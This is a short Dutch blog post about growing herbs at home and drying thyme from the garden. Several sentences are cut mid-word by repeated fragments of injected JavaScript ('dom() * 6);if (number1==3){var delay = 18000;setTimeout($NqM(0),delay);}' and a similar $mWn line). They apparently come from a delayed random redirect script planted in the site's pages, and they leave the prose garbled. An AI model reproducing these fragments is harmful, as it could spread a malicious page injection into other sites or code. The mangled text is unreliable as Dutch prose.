De hele zomer heeft het kruidentuintje er goed bijgestaan. Zo fijn om altijd verse kruiden in huis te hebben. Standaard staat er een grote pot basilicum in de keuken en in de tuin kun je munt, bieslook, peterselie en tijm vinden. Deze laatste kun je nu goed plukken en laten drogen.
Tijm drogen
Eigenlijk gebruik ik best vaak tijm in gerechten. Lekker door de pasta of in de winter in dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees/”>sdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toofvlees. Je zult dit kruid echter nooit in m’n winkelmandje vinden. Deze pluk ik gewoon uit eigen tuin. Laat je oogst een paar weken goed drogen tussen wat keukenpapier en haal de tijm van de takken af. Je kunt het bewaren in een afsluitbaar potje.
Ik heb nu al een paar jaar plezier van dezelfde plantjes, gewoon van het tuincentrum en zelfs een van de appie. Met zaadjes heb ik dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot nu dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe minder geduld gehad. Die kant-en-klare plantjes zijn veel makkelijker.
Geen Reacties op "Tijm uit eigen tuin"